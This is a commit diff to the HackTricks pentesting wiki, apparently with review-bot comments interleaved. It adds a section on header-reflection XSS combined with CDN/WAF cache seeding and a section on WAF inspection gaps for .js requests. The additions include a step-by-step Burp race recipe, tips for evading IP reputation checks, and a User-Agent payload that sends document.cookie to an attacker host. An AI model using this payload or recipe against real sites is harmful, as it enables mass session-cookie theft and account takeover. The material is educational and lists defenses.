mirror of https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00

Add content from: How I found a 0-Click Account takeover in a public BBP and l...

This commit is contained in:
parent 13f2a46a65
commit d6a776e9d0
				| @ -172,6 +172,44 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul | |||||||
| 
 | 
 | ||||||
| Example usage: `wcvs -u example.com` | Example usage: `wcvs -u example.com` | ||||||
| 
 | 
 | ||||||
|  | ### Header-reflection XSS + CDN/WAF-assisted cache seeding (User-Agent, auto-cached .js) | ||||||
|  | 
 | ||||||
|  | This real-world pattern chains a header-based reflection primitive with CDN/WAF behavior to reliably poison the cached HTML served to other users: | ||||||
|  | 
 | ||||||
|  | - The main HTML reflected an untrusted request header (e.g., `User-Agent`) into executable context. | ||||||
|  | - The CDN stripped cache headers but an internal/origin cache existed. The CDN also auto-cached requests ending in static extensions (e.g., `.js`), while the WAF applied weaker content inspection to GETs for static assets. | ||||||
|  | - Request flow quirks allowed a request to a `.js` path to influence the cache key/variant used for the subsequent main HTML, enabling cross-user XSS via header reflection. | ||||||
|  | 
 | ||||||
|  | Practical recipe (observed across a popular CDN/WAF): | ||||||
|  | 
 | ||||||
|  | 1) From a clean IP (avoid prior reputation-based downgrades), set a malicious `User-Agent` via browser or Burp Proxy Match & Replace. | ||||||
|  | 2) In Burp Repeater, prepare a group of two requests and use "Send group in parallel" (single-packet mode works best): | ||||||
|  |    - First request: GET a `.js` resource path on the same origin while sending your malicious `User-Agent`. | ||||||
|  |    - Immediately after: GET the main page (`/`). | ||||||
|  | 3) The CDN/WAF routing race plus the auto-cached `.js` often seeds a poisoned cached HTML variant that is then served to other visitors sharing the same cache key conditions (e.g., same `Vary` dimensions like `User-Agent`). | ||||||
|  | 
 | ||||||
|  | Example header payload (to exfiltrate non-HttpOnly cookies): | ||||||
|  | 
 | ||||||
|  | ``` | ||||||
|  | User-Agent: Mo00ozilla/5.0</script><script>new Image().src='https://attacker.oastify.com?a='+document.cookie</script>" | ||||||
|  | ``` | ||||||
|  | 
 | ||||||
|  | Operational tips: | ||||||
|  | 
 | ||||||
|  | - Many CDNs hide cache headers; poisoning may appear only on multi-hour refresh cycles. Use multiple vantage IPs and throttle to avoid rate-limit or reputation triggers. | ||||||
|  | - Using an IP from the CDN's own cloud sometimes improves routing consistency. | ||||||
|  | - If a strict CSP is present, this still works if the reflection executes in main HTML context and CSP allows inline execution or is bypassed by context. | ||||||
|  | 
 | ||||||
|  | Impact: | ||||||
|  | 
 | ||||||
|  | - If session cookies aren’t `HttpOnly`, zero-click ATO is possible by mass-exfiltrating `document.cookie` from all users who are served the poisoned HTML. | ||||||
|  | 
 | ||||||
|  | Defenses: | ||||||
|  | 
 | ||||||
|  | - Stop reflecting request headers into HTML; strictly context-encode if unavoidable. Align CDN and origin cache policies and avoid varying on untrusted headers. | ||||||
|  | - Ensure WAF applies content inspection consistently to `.js` requests and static paths. | ||||||
|  | - Set `HttpOnly` (and `Secure`, `SameSite`) on session cookies. | ||||||
|  | 
 | ||||||
| ## Vulnerable Examples | ## Vulnerable Examples | ||||||
| 
 | 
 | ||||||
| ### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577)) | ### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577)) | ||||||
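Review bot: the example `User-Agent` payload in the new section ends with a stray `"` after the closing `</script>`; either drop it or state in the lead sentence that the quote is needed to close the surrounding attribute, because as written the reader cannot tell whether it belongs to the payload. That fenced block is also untagged; give it a language (e.g. `http`) so it renders like the other examples. In the first bullet list, "influence the cache key/variant used for the subsequent main HTML" does not say which dimension is involved, while step 3 below it names the `Vary` on `User-Agent`; stating that precondition up front makes clear why a header reflection ends up in a shared variant. Finally, under Defenses it is worth saying that `HttpOnly` only removes the cookie-exfiltration impact, while the first two bullets (no header reflection, consistent CDN/origin cache policy, consistent WAF inspection of static paths) are what actually prevent the poisoning.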
| @ -245,9 +283,8 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S | |||||||
| - [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/) | - [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/) | ||||||
| - [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9) | - [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9) | ||||||
| - [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/) | - [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/) | ||||||
|  | - [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/) | ||||||
|  | - [Burp Proxy Match & Replace](https://portswigger.net/burp/documentation/desktop/tools/proxy/match-and-replace) | ||||||
| 
 | 
 | ||||||
| 
 | 
 | ||||||
| {{#include ../../banners/hacktricks-training.md}} | {{#include ../../banners/hacktricks-training.md}} | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
|  | |||||||
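Review bot: the two new reference entries use descriptive link text, while the existing entries in this list use the bare URL as link text; pick one style for the list, either by converting the new entries to bare URLs or by leaving a short note that titled entries are preferred going forward. The header's 9 to 8 line count also shows trailing blank lines being dropped at the end of the file, which is fine but unrelated to the commit subject.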
| @ -131,7 +131,24 @@ By default, the WAF inspects only the first 8KB of a request. It can increase th | |||||||
| 
 | 
 | ||||||
| Up to 128KB. | Up to 128KB. | ||||||
| 
 | 
 | ||||||
| ### Obfuscation <a href="#obfuscation" id="obfuscation"></a> | ### Static assets inspection gaps (.js GETs) | ||||||
|  | 
 | ||||||
|  | Some CDN/WAF stacks apply weak or no content inspection to GET requests for static assets (for example paths ending with `.js`), while still applying global rules like rate limiting and IP reputation. Combined with auto-caching of static extensions, this can be abused to deliver or seed malicious variants that affect subsequent HTML responses. | ||||||
|  | 
 | ||||||
|  | Practical use cases: | ||||||
|  | 
 | ||||||
|  | - Send payloads in untrusted headers (e.g., `User-Agent`) on a GET to a `.js` path to avoid content inspection, then immediately request the main HTML to influence the cached variant. | ||||||
|  | - Use a fresh/clean IP; once an IP is flagged, routing changes can make the technique unreliable. | ||||||
|  | - In Burp Repeater, use "Send group in parallel" (single-packet style) to race the two requests (`.js` then HTML) through the same front-end path. | ||||||
|  | 
 | ||||||
|  | This pairs well with header-reflection cache poisoning. See: | ||||||
|  | 
 | ||||||
|  | - {{#ref}} | ||||||
|  | cache-deception/README.md | ||||||
|  | {{#endref}} | ||||||
|  | - [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/) | ||||||
|  | 
 | ||||||
|  | ### Obfuscation <a href="#ip-rotation" id="ip-rotation"></a> | ||||||
| 
 | 
 | ||||||
| ```bash | ```bash | ||||||
| # IIS, ASP Clasic | # IIS, ASP Clasic | ||||||
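Review bot: the `### Obfuscation` heading's anchor is changed from `id="obfuscation"` to `id="ip-rotation"`, which breaks any existing `#obfuscation` deep links and leaves an id that no longer matches the heading text; keep `id="obfuscation"` here and, if an IP-rotation anchor is wanted, attach it to whichever section covers IP rotation. The new `### Static assets inspection gaps (.js GETs)` heading has no explicit anchor at all, unlike the neighbouring headings, so add one for consistency. In the "See:" list the `{{#ref}}` block is nested inside a `-` list item; confirm the include preprocessor renders it there, and that the relative path `cache-deception/README.md` resolves from this file's directory, since the other file in this patch includes banners with `../../` while this one uses `../`.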
| @ -223,9 +240,7 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri | |||||||
| - [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) | - [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) | ||||||
| - [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g) | - [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g) | ||||||
| - [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization) | - [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization) | ||||||
|  | - [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/) | ||||||
| 
 | 
 | ||||||
| 
 | 
 | ||||||
| {{#include ../banners/hacktricks-training.md}} | {{#include ../banners/hacktricks-training.md}} | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
|  | |||||||